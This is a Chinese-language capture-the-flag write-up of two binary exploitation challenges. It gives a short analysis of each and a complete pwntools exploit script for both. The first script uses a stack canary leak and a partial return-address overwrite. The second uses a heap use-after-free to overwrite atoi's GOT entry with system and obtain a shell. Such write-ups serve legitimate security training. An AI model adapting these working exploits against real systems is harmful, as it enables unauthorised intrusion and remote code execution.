铁三初赛PWN

多亏师傅们带飞,本次排名第四赛区第二,排名如下^_^

img

pwn1[namepie]

ssize_t sub_9A0()
{
  char s; // [rsp+0h] [rbp-30h]
  unsigned __int64 v2; // [rsp+28h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(&s, 0, 0x1EuLL);
  puts("Input your Name:");
  read(0, &s, 0x30uLL);//vul
  printf("hello %s: and what do your want to sey!\n", &s);
  return read(0, &s, 0x60uLL); //vul2 堆栈溢出
}

前言

程序留了后面函数,保护全开

思路

先使用第一次输入泄露cannary,然后在使用后一次输入低字节覆盖return 地址为后门函数地址,打通几率1 / 16

EXP

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
# Env: Linux arch 5.8.14-arch1-1

from pwn import *
import os

r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']

elf_path  = 'pwn'
libc_path = './libc.so.6'

# remote server ip and port
server_ip = "172.20.14.177"
server_port = 9999

# if local debug
LOCAL = 0
LIBC  = 0

#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)


#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    p = 'A' * 0x28 + '\x01'
    s(p)
    ru('\x01')
    cannary = u64('\x00' + r(7))
    li('cannary: ' + hex(cannary))
    p = 'A' * 0x28
    p += p64(cannary)
    p += p64(0)
    p += '\x71\xaa'
    #db()
    s(p)


def finish():
    ia()
    c()

#--------------------------main-----------------------------
if __name__ == '__main__':

    #for i in range(255):
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
            io = elf.process(env = {"LD_PRELOAD" : libc_path} )
        else:
            io = elf.process()

    else:
        elf = ELF(elf_path)
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)

    exploit()
    finish()

pwn2 [onetime]

前言

pie保护没开,一个菜单堆题,在添加和删除编辑都采用相应的标致来避免重复第二次操作。漏洞点在释放内存后没有将数据指针清0还有在其他操作没有做好相应的检查,造成uaf漏洞。

思路

通过uaf漏洞,打入bss段的buf附近,修改edit_flag为0为了再次实现修改功能,同时修改buf为atoi plt.got地址,然后再通过uaf漏洞泄露libc,再次修改atoi的got中数据为libc中system函数地址,在输入选项时输入’sh\x00’即可获得shell

EXP

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
# Env: Linux arch 5.8.14-arch1-1

from pwn import *
import os

r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li  = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')


context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']

elf_path  = 'pwn'
MODIFY_LD = 0
arch = '64'
libc_v = '2.23'

ld_path   = '/glibc/' + libc_v + '/' + arch + '/lib/ld-linux-x86-64.so.2'
libs_path = '/glibc/' + libc_v + '/' + arch + '/lib'
libc_path = '/glibc/' + libc_v + '/' + arch + '/lib/libc.so.6'
libc_path = './libc.so.6'

# change ld path 
if(MODIFY_LD):
    os.system('cp ' + elf_path + ' ' + elf_path + '.bk')
    change_ld_cmd = 'patchelf  --set-interpreter ' + ld_path +' ' + elf_path
    os.system(change_ld_cmd)
    li('modify ld ok!')
    exit(0)

# remote server ip and port
server_ip = "172.20.14.177"
server_port = 10001

# if local debug
LOCAL = 0
LIBC  = 1


#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)

def ad():
    sla('>>', '1')

def fi(d):
    sla('>>', '2')
    sa(':', d)

def dp():
    sla('>>', '3')

def rm():
    sla('>>', '4')

def lv(d):
    sla('>>', '5')
    sa(':', d)

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    ad()
    rm()
    p = p64(0x60207d + 0x10)
    fi(p)
    ad()

    p = 'A' * 3
    p += p64(0)
    p += p64(elf.got['atoi'])
    lv(p)

    dp()
    leak = u64(ru('\x7f')[-5:] + '\x7f\x00\x00')
    libc_base = leak - libc.sym['atoi']
    system = libc_base + libc.sym['system']
    li('libc_base: ' +hex(libc_base))

    fi(p64(system))
    #db()
    s('sh\x00')

def finish():
    ia()
    c()

#--------------------------main-----------------------------
if __name__ == '__main__':

    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
            io = elf.process(env = {"LD_LIBRARY_PATH" : libs_path, "LD_PRELOAD" : libc_path} )
        else:
            io = elf.process(env = {"LD_LIBRARY_PATH" : libs_path} )

    else:
        elf = ELF(elf_path)
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)

    exploit()
    finish()